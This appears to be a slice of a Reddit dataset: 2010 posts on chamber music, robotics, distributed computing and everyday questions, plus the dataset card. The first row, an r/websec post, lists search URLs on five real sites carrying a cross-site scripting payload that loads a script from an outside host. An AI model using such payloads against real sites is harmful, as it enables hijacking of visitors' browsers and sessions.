* [Joystiq.com](http://joystiq.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Downloadsquad.com](http://downloadsquad.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Tuaw.com](http://tuaw.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Autoblog.com](http://autoblog.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Asylum.com](http://asylum.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
| r/websec | post | r/websec | 2010-01-07 | Z0FBQUFBQm5IcUlYM00xT3lKdVdhYkcxQ0U3Vy1lTGtqNHVRQjdyX0pCX0FKNkhLdVhpWExWeXhfaE90TVU2R1NqTVdxOURxQkVybWszaVdtVGRJZkl0VWRmdXZjVnI4SGc9PQ== | Z0FBQUFBQm5IcUowVE1fWU9jMVk3YlZFOVRyNFZiaWVGNDBuWWVlRjd6RjlnVWZHcHFJcjRyMXpnSkdYZEVwS3dJVC1oUk1kRjR6U3JHS3p1aV9faFpkYzBMcE9xeGhWMzFJYk1zYk5iLXdnb3RQSGhmODQtMDNaazBRNlFidExKMDgzRWhhN1JqdWh4TzhFOFlHdFAxOXFTVWY1ME5rd2lFRlVpdEpkT2RxZ0c2LWRZR0YyTEdNd1MteXJnaGFOa0lMbThkaXVaT3dZ |
This is an organized list of all the game hints. Feel free to post comments about new hints and your interpretations of hints. I will try to keep this post up to date with new hints.
[http://www.usfirst.org/roboticsprograms/frc/content.aspx?id=16119](http://www.usfirst.org/roboticsprograms/frc/content.aspx?id=16119) | r/firstrobotics | post | r/firstrobotics | 2010-01-08 | Z0FBQUFBQm5IcUlYaW9QZFByMzJUOHg1QzVQbVQ4QU5SSmZJN3lGQjRYN1UtQzMzeGROWVdNeWpPbzhrZFBpZXNZY1NzaVEwbEpTM3BHTldkWGNaWGhxNzFEcW1YUml0SXc9PQ== | Z0FBQUFBQm5IcUowYktHbFVXcS1KbW1jeThZOTh6VWlLSDBEVGttZzQ0UDlxLXBvYTg5d2c3cDlUZzJEd25uTDZDazJYeFdXdUY2aXdjb0I4R3BDUVJxVG51dldFQUx6VHg1RC1NOWVEOEYyZFFrTEZUVUlVSDJHQTJ6RU9sc2NNVlpzNGh0bmhReGNldnRBUTFmQ21tcmdzeWFPbGtMU0RjTUtkbnpRQ2Z6VzROTTFYSnBCb1JKWGIxSlZqd19wTklFX2x6V3l5UWNy |
I am in the midst of planning for a concert of mostly my own chamber compositions (violin trios and woodwind quintets). It is exciting, stressful and rewarding. It looks like late March. Music in the musician's hands at the end of this month.
I have written for groups that I know or think I can convince to read my music. I have gotten readings from professional groups and friends of mine.
The material for this concert was dreamed up thinking I'd have my own woodwind quintet (I'd play oboe) and also emply a local Violin Trio (vln, clo,pno). | r/chambermusic | post | r/chambermusic | 2010-01-11 | Z0FBQUFBQm5IcUlYa2Rpa2JheS1VVWh0NGR3ak1pamYtU09KMy1Ra2FoOC00X0d3ZjhUTmNJRnhtZnZ4bWljWXV5dEJieXNGUkhsdjRaOGlxdUlFdWczUDVORGVieEFscFE9PQ== | Z0FBQUFBQm5IcUowalV5RGI1VXp0VEN3ZFhYZGt3MzROTHBHSGhrRFJDU3ZHcGdzYXo3bDdZaDVCUmlsVktJWHdidGlPTjdRRVg3czRFX2VaUjVOUExnekNVOG5MR2ZjYnU0Rzd2RDIxLThWZGJ5WFdETFBEQk5kSGNWeGhnZEtyZzVhcTBHb2dMTGN0d3ZaNUVlZTJRMXVCa00yR1p3QmdfOXFzTTZsWFF0RExpLVZvekVHWkE5QlFnS3R4WGhtbDkza1gxYnE5VTFXSW5raFJPVjRma1Mzd2dJMmRDeTM3Zz09 |
I'm a violinist and I miss playing in a string quartet so much.
I've been out of school for a few years and don't know many people in the area. Not exactly finding violists and cellists on Craigslist...and there is a local community orchestra, which I thought would be great for meeting other string players, but the level of talent is all over the place and the odds of finding enough people to make a good group are slim to none.
I'm a bit at a loss, can anyone offer tips or suggestions for meeting other musicians to form a chamber group? | r/chambermusic | post | r/chambermusic | 2010-01-12 | Z0FBQUFBQm5IcUlYNm10QndpVWhKbmlxNFlzQnJNcGRxYzlkWmU2YjVnb01Ud3kyNUozRWFNYktrR2k5ZTBXc21HazZhUzFyX3kwdFl4a2w4OWE5WGI3SUV2bmpLR01qa1E9PQ== | Z0FBQUFBQm5IcUowSnU1ZVhpdEpicEUtLXQxYks3dHVUN28zamFQU0VLdU5DemtZXzI5ZGhybnhIVHh5cDVyOUhJa3laaUFNajk4RWVDeGdkNmlLQXFGTHM0OUd2Uk9JeXJPRGpURGdTdG4xa2xNU3RTb01mNEVEeVpwNGdRUnc5cEREUV9lMjUxaGYwUDNJTDE4VWE5T2JKQlY4S3JMQWxzeGdBcm93N3V3NVE5TkZYbGw5WXFyZFhyS1VzOTlhTkViUGF1Wnk0Mi1aV3IwY0NITGdUOW1hNnl6RTZOalNHUT09 |
I just saw [this OK GO](http://www.youtube.com/watch?v=UJKythlXAIY) video. Amazing.
Other stuff that I see similar chamber music influences in.
[New Soul](http://www.youtube.com/watch?v=XgEfYGzojcA) by Yael Naim
[Chicago](http://www.youtube.com/watch?v=l1PUqZyeuAk&feature=related) or [Jacksonville](http://www.youtube.com/watch?v=zWOgs5bLqG0&feature=related) by Sufjan Stevens
[Guyamas Sonora](http://www.youtube.com/watch?v=ukU-E5Qp4Kg) by Beirut
[A Nervous Tic Motion of The Head To The Left](http://www.youtube.com/watch?v=wRk2iHkOcNE) by Andrew Bird. I haven't heard them much, but they are similar.
I can't get enough of this music just like I can't get enough sounds like Hindemith's chamber music. Lush, thoughtful, changing.
**Can anyone recommend similar music modern or old?**
**Thoughts from r/chambermusic?** | r/chambermusic | post | r/chambermusic | 2010-01-13 | Z0FBQUFBQm5IcUlYWFVCX3hmeFc3N1NuUkN1U1d2WlBPdWRfeGZWWlVDdGFtX2tEcUhHVWhSUk5ZeGQ5X3VRUUcyMW1BcE5TOU5CLTk4ZU5RWWZMNlhXTW0ybE1mRUVRVGc9PQ== | Z0FBQUFBQm5IcUoweWhKQktWLVJ4WFZLS3NhYUxXRFk0VW1zeDNOTFh6em5ERm43dFF2VVhvVHN5MHB5Nnd0QlphOHFjT2hONnNLZmhoek5yUHYtSXFvY29HVWRDWUR2VHBGMkl5VHZpLWR0OFVWWGRZR1BBOF9hRXFwQjhEeUdfRDdVcjAtT3NObTZNYmU0eWdLTXR3bWhNdXpMa2RkbF9ONTNVQ2MzWHJGbDBsNmZBN0YxcVBrUElZVVcyMC1hSzAzdGlPWTRHemdI |
Just found out this subreddit doesn't exist, so I created it.
Now, we need people reading it! Suggestions are welcome! | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-15 | Z0FBQUFBQm5IcUlYRUFuWmJXTUo1eEFMU0JkY25zQWZQSGFUenBHTzNKbURmTmFhRlI4RmxVdjRpVjd6RVZnNm1uTnpLaFdiZWJ4N01DV18teG1oTmZCaEhRazRGeHU2YUE9PQ== | Z0FBQUFBQm5IcUowS0R5eFo3dTBjMkhIYVh5SG9HQUEwMUxPRHQ4TUhyRndvYXdHTEJmd1NxSGREc2NBSVlGb0xfYml5NkIteWtMcXNiVkZYaHRmam9USjBSQk9ZZVljMXVJaHRpWUxqSjVhbEVHbGdkd2lhdDl0dXQ3MWEzeWdGdGRYVXQ5dWRja1FxSzhkTGt6eDFKbzRPSXZ1bFFCLUNyN1ZwajNaQ1NhSHprdzhjeEVtal9fTEVDVHAxNUNWZE1nTkFjN2ozMmh6Ui13bEZxQW1WeWpoZnljQ0NsRk5FUT09 |
This group is awesome. I saw a video at http://idrs.org which is my favorite group to be a part of. Their publication is top rate, 1 yr membership is only $50 and their website has scores, midi accompianment, older scores and arrangements (in pdf and finale) and videos. I just found the videos, but since you need to be a member to see them I looked on youtube. Not as good quality, but still worth a listen.
**Tateshina Bassoon Quartet**
[Courant](http://www.youtube.com/watch?v=mCUTkF1kdUs) | r/chambermusic | post | r/chambermusic | 2010-01-15 | Z0FBQUFBQm5IcUlYa1dFaVI2TjlQVG1xaWNpeDJ3V3Rid20xRTdVcnFVQWtZMnY4dHMyNjBxZlN5eHVZQWVuaUQ5dW9YdDhrX2lqTWdIRDZ1OXR3cVhNUU43clZub1oyNGc9PQ== | Z0FBQUFBQm5IcUowTHRvdk5KRF9USVRFSzdEOUZLMTR6WE5wVldEUmNhZmNhWnRpVXFhTnF2T0NNSzhNeTlVcE0yMmhKX2NiY205bG5sMVNkeXdKTXBWX0ExOGVfMU1hU2tweDRraGxXbTR1MFhPTzh6YmRGMUVreFdMclhJYmVobDN0RFMyREZZYXFfV0tjaEtNYWhrZWJKc0hJOWhwU25pY0dBOTdzN21ZR1NqbUxIZXV1N0tUREt4dWRLQno0LVktV1UyVVAyc29O |
I'm from Team 555, Montclair Robotics. We're located in Montclair, NJ. | r/firstrobotics | post | r/firstrobotics | 2010-01-15 | Z0FBQUFBQm5IcUlYWnRXNWZiVmFhUERIa0lCQ0JWWDI0Q3U1RkVrZjRFOUVVbGFSRmx2M3FVb19uTThMSU5mQ0ZNOEpWbnBHNmJZMUg3VVNucXJBOXhPald2ZUhWRXVFS3c9PQ== | Z0FBQUFBQm5IcUowM2lmUEZnY1ZGX0NNWUdpWUVvaHlTempid19ERElYTDBPeUNJMmt1VFpGOURxb01XdXo3dHJPdzJUQXZkZlVMQnJoZkpKbzBNeURGUVRTR1BlUUlDX19XM3RWczQ3VF9jWGhVcU90UmUxRXRFUmJ0RWlPTVU5OEhQd1A1U3k0UFRCYmh6Nk1yZ0FvREhKQk5VMkZVbXY1dUhRd2lsbWhSUHMxTWlmTm5mbHpWbFFISlJwNW5GV1g2TGVzWXpnTnhKOEM1SjhIb3d2eWljSndVczRBWVdBQT09 |
Not hosts that charge too much for what they offer, or hosts that offer way too little to handle dynamic content. Basically, I'm looking for somewhere that I can pay decent money to carry an imageboard. Not an imageboard as popular or as bandwidth-guzzling as 4chan, course. | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-15 | Z0FBQUFBQm5IcUlYWGZ0VFRLbmFsVzNrWlB6enlrdkZLU3U0WWphdFlsVzV1dmtUZVMxcGhvbFEwajZXQUJCUTdYVWg1UUtUNDJUdzFqdjE3bXZFQ3dZYUtuLWtDY2xQN2c9PQ== | Z0FBQUFBQm5IcUowTExpYjJHd2hVMkJOYjM0bGk0YWI5b3dMLXRZWUdoakVHY01HTzM5RDNvdEZRYkxrT1RnX3RCVEZZVnM5QUpLemx0STRZMmI1T3RLcXprbFU1UXpkWFJUVnktYzBOZVVuM1ZwbnByRzVCcDFNeC1ZUU9IazdOem5DcHJPdnpKdC10VmJqSno5SGQ1dkgzdmJNTjVQOEE2SE1KTG1kV1p0Z3piUzF5Njh2SlZ5YTJaVUo0NE5TajktTzE1VldnQ0h1 |
Join! It's winter for most of us so there is no excuse. Ask here for help, no matter how simple.
Currently placed ~1300th with over 2.3 million points
* [Detailed statistics](http://kakaostats.com/tsum.php?t=50959)
* [More stats, graphical](http://stats.free-dc.org/stats.php?page=team&proj=fah&team=50959) | r/distributedcomputing | post | r/DistributedComputing | 2010-01-15 | Z0FBQUFBQm5IcUlYU1ozd3hoYmJTQVRCY1BPRlVtU1ZyS21weGRuZEt1bUVhVC15T2JvLW1XRVloRzdaZmoyM0dpQ1hTaTdzRl9BeVZxSk5rTmNCN1czcHhLcy1ieU9fNHc9PQ== | Z0FBQUFBQm5IcUowcUw0Rnl2aG1BY01vU2Y0VmtrbFhjYTFyWEtZZ2lqV25CR2hoNlh5ak1PVUlQS2hlRi1aczNxWEMzWTVFY2NlbmM5Z0hiUjJnYUtIemlObm5faldzUDFTbG0ydTZrdXlydU9JSmZ2cHZXaWxEZ3cyNVRFVXJhVjBhdkloTVdEV3JlREpfMkJOb1NuUkp1VkQ5Nl9OX0xWM2JqV3Y0eEw1NFJRbWsydmtmWWxIMmlYYkVQTllkNDNvMlU4eVQwM05r |
I thought it would be interesting to see everyones configuration as far as hardware and software goes. The points per wu seem to vary pretty wildly so it'd be nice to match up performance with the wu's people seem to get.
Edit: Also, since this is distributedComputing in general, tell which @home projects that you do work for. | r/distributedcomputing | post | r/DistributedComputing | 2010-01-15 | Z0FBQUFBQm5IcUlYZDA5MXM5TVZTWlJmbDBSRkdtNE5XUklpNEh2a0dOcXdlVTRFaHJlTF9HdHVqcnd2SUpnZjRRaUllNnZlSHlMdGxmZXlQeTRmS1hpODlEUWJxeldkWlE9PQ== | Z0FBQUFBQm5IcUowcEZILXFIaDFWeGdvckFBQnNhclQ2OEhWRjdObjJIaFB4elpFY1pYZ1RndnpkaTc1ZW8tTVM3ai0yRU0tR05YeEdQRUU5X21kdWNySEZXQ2R0VlZJbmEzY0F0T3hnTm5CUGE1VGJJakVzNmViVU4xZWFvMmltNUF0MWJOS3ZFeDE4aXIzU0tvODlzdUR0SFhYQk16OUVNVWZ4VnBldGNTZ0ZrUFB1eUZwNWFlQnhIekN6cWdmNnFHV010TklpYUtZNlBpUXp3dnFZTi10WXdhQndIc25udz09 |
[Here's a clip] (http://www.youtube.com/watch?v=qKRhMTvXbLY) of the specific episode I'm looking for. Flower Power. | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-16 | Z0FBQUFBQm5IcUlYd1NNRDZHXzhjSmdIc21QYVNqNWdodjVhUmNnZG0yeFZVNDdsWUZkUFVIdThROW5RckUwY3lmVXJoQ04ybENqdTlnMk5JNEpWeFNUSzhsTDFORDM5NVE9PQ== | Z0FBQUFBQm5IcUowcWtpWC1PRnlWcDFTbi1qOTlsZ0xIMklJV2R3Z25rTVh6VmdGSXhleVFObTBJR1hEUlNnRnRvdi1XUkZCQmtOR1lXb0hubGpqdUxyWEFxVFpUWDNHTHVUQnRyeWpJcnRPeEVMRzY4ekFTRnp6RmFiWmhLbWpoSHVDSzdnX0laUnBQZTRIMFVlRTlSTXFNSFVCd2tnWk1EVklESy1yRjlMcldoTWZIR0NqZG1Da2JXS2hZTG1lalhjRmJ1NmU4dXlZMFZ3MjVMWFA1Ni02Zk5qNTE4M3FXdz09 |
Every time I break them over the pan, some bullshit happens (such as breaking the yolk). How can I prepare perfect fried eggs? | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-16 | Z0FBQUFBQm5IcUlYSTlubllVVVBMUlRvemp0UkVsZlliajRpTWJzRks1aFQtb1o0VWQ5Umk4RS04RTRIUFgwMTVLckxXalYyeVZHUkRDbG5vam4tZ1l4Zlk2V2U4M3c0RFE9PQ== | Z0FBQUFBQm5IcUowRzdjdDlVRjNrQ1lka2tWYTF5aGpwZXo2bzljVWZyZzB0RksyY1hQLTR3VzdMdDcyenZoYm1jZ3FvelowNndWa3NDQnd5WTdQLXZtb0l3LTdzaVltN3V0UVIybDJyb1doMG50ZzVQN0U4azJSMlZkdzRHbnlwUXo3cjRZVFdaZXFFSms1STR4ZUgtd0VPVFBNeVNCakFjZnlNelRfX1RpZm5tcWtXLVdPUWZPMFhEcndoTC1xaGM4Y3VtcU9pb0lreVp6b0hXUTh1bkZjRnZfNThjY0lYdz09 |
Hell, is it even possible?
~inb4fourtytwo | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-18 | Z0FBQUFBQm5IcUlYSDNiX0U0ajdwMzJNVVZFTzIyMTczTFJfaHh3ckNXWU9KTF9VcDFYN2EyTnNaNVk3WHo4d2hWN0djYVlaQ3QzRTBLbXdXc1dKRVhQSXp5SzVqd3NaY1E9PQ== | Z0FBQUFBQm5IcUowVnRGdHlNYllHNC1iaWdBM1BFSzY5SjNkVGFzd0o2dGpfMTlkeEVlUXd5ZG12Y19sVE5lWGIyeElMOXJFMlExSWZLQkNfWjhYeG1yZWMyXzZzWGhBZGUtOVF0ZEVkYTNhUmFMcDhpalA4Vzg0OWVaYkZCMldJdUJpWDVHMEVnTzZlZWEwRy05SVNlVmhOZFBneDZ0RktGcUpqclJNSjdMa05qWDBkTFUzSjZ4MHQ3cmdmdXZ4NS1NY29XcTY3bGZM |
As a token of my gratitude I'm giving away 5 Demonoid invite codes:
Make sure to post back to tell us which one you have taken.
Enjoy. | r/p2p | post | r/p2p | 2010-01-18 | Z0FBQUFBQm5IcUlYcnVWbEJ1b2dhVEJENHJOVjEwaDRRWnltVE5DaXkwa3Z2UFNJMF9PX1JBVk5fU1pJeEF3ekpXTmtkUnFla0dGNDgtandJM296akxSdTlIRHF5eTlYVXc9PQ== | Z0FBQUFBQm5IcUowY0Y2ckdkblk4ZlA0VHZpOEFOUFByLXlwY1VSNXBLUTRLcGlQRXpyRXZlc3E0T0MtRy1XeEVQZGpIZ1VtNWtuZ2xDdmg0NVVnOUFKdkNDb0Z6YzBwak1yY0w2SW8wR1RtOVA5dUhObnVnT2lGbFVObGszZTJ2X1ZMU1ZmYUlBY0pxSFRkTlFRM2RBUjljRkJEWnRUZjl5Q29iUDVwVUdXQzVYNXZVdVVGbEZ3VVRPLWVsN09VZENaemJjOTdHdHRh |
Bittensor Subnet 13 Reddit Dataset
Dataset Summary
This dataset is part of the Bittensor Subnet 13 decentralized network, containing preprocessed Reddit data. The data is continuously updated by network miners, providing a real-time stream of Reddit content for various analytical and machine learning tasks. For more information about the dataset, please visit the official repository.
Supported Tasks
The versatility of this dataset allows researchers and data scientists to explore various aspects of social media dynamics and develop innovative applications. Users are encouraged to leverage this data creatively for their specific research or business needs. For example:
- Sentiment Analysis
- Topic Modeling
- Community Analysis
- Content Categorization
Primary language: Datasets are mostly English, but can be multilingual due to decentralized ways of creation.
Dataset Structure
Data Instances
Each instance represents a single Reddit post or comment with the following fields:
Data Fields
(string): The main content of the Reddit post or comment.label
(string): Sentiment or topic category of the content.dataType
(string): Indicates whether the entry is a post or a comment.communityName
(string): The name of the subreddit where the content was posted.datetime
(string): The date when the content was posted or commented.username_encoded
(string): An encoded version of the username to maintain user privacy.url_encoded
(string): An encoded version of any URLs included in the content.
Data Splits
This dataset is continuously updated and does not have fixed splits. Users should create their own splits based on their requirements and the data's timestamp.
Dataset Creation
Source Data
Data is collected from public posts and comments on Reddit, adhering to the platform's terms of service and API usage guidelines.
Personal and Sensitive Information
All usernames and URLs are encoded to protect user privacy. The dataset does not intentionally include personal or sensitive information.
Considerations for Using the Data
Social Impact and Biases
Users should be aware of potential biases inherent in Reddit data, including demographic and content biases. This dataset reflects the content and opinions expressed on Reddit and should not be considered a representative sample of the general population.
- Data quality may vary due to the nature of media sources.
- The dataset may contain noise, spam, or irrelevant content typical of social media platforms.
- Temporal biases may exist due to real-time collection methods.
- The dataset is limited to public subreddits and does not include private or restricted communities.
Additional Information
Licensing Information
The dataset is released under the MIT license. The use of this dataset is also subject to Reddit Terms of Use.
Citation Information
If you use this dataset in your research, please cite it as follows:
title={The Data Universe Datasets: The finest collection of social media data the web has to offer},
To report issues or contribute to the dataset, please contact the miner or use the Bittensor Subnet 13 governance mechanisms.
Dataset Statistics
[This section is automatically updated]
- Total Instances: 195099434
- Date Range: 2008-11-10T00:00:00Z to 2024-11-19T00:00:00Z
- Last Updated: 2024-11-19T02:54:24Z
Data Distribution
- Posts: 0.93%
- Comments: 17.22%
Top 10 Subreddits
For full statistics, please refer to the stats.json
file in the repository.
Rank | Topic | Total Count | Percentage |
1 | r/teenagers | 39255 | 0.02% |
2 | r/blackops6 | 38049 | 0.02% |
3 | r/relationship_advice | 37394 | 0.02% |
4 | r/PokemonGoFriends | 35139 | 0.02% |
5 | r/NoStupidQuestions | 34979 | 0.02% |
6 | r/soccer | 34957 | 0.02% |
7 | r/TopCharacterTropes | 34809 | 0.02% |
8 | r/factorio | 33340 | 0.02% |
9 | r/MtF | 32987 | 0.02% |
10 | r/EDH | 32566 | 0.02% |
Update History
Date | New Instances | Total Instances |
2024-10-28T01:47:37Z | 65495797 | 65495797 |
2024-10-31T16:45:43Z | 82634058 | 148129855 |
2024-11-04T06:16:30Z | 11562788 | 159692643 |
2024-11-06T17:43:27Z | 226569 | 159919212 |
2024-11-08T12:10:33Z | 269936 | 160189148 |
2024-11-12T00:53:53Z | 11649677 | 171838825 |
2024-11-15T13:50:32Z | 11758029 | 183596854 |
2024-11-19T02:54:24Z | 11502580 | 195099434 |
- Downloads last month
- 1,577